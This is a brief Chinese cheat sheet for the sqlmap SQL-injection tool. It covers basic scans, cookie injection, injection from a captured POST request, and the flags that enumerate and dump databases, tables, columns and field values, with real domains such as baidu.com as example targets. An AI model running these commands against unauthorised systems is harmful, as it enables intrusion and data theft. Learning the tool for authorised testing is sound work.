基本格式
sqlmap -u "http://www.vuln.cn/post.php?id=1"
預設使用level1檢測全部資料庫型別
sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3
指定資料庫型別為mysql,級別為3(共5級,級別越高,檢測越全面)
cookie注入
當程式有防get注入的時候,可以使用cookie注入
sqlmap -u "http://www.baidu.com/shownews.asp" --cookie "id=11" --level 2(只有level達到2才會檢測cookie)
從post資料包中注入
可以使用burpsuite或者temperdata等工具來抓取post包
sqlmap -r "c:\tools\request.txt" --batch --dbs
使用sqlmap的語句
--dbs 檢視所有資料庫
--current-db 檢視當前資料庫(拖庫)
--tables -D "資料庫名" 檢視當前資料庫表 (拖表)
--columns -D "資料庫名" -T "表名" 檢視當前資料庫當前表的列 (拖列)
--dump -C"列名" -D "資料庫名" -T "表名" 檢視當前資料庫當前表當前列欄位值 (拖欄位)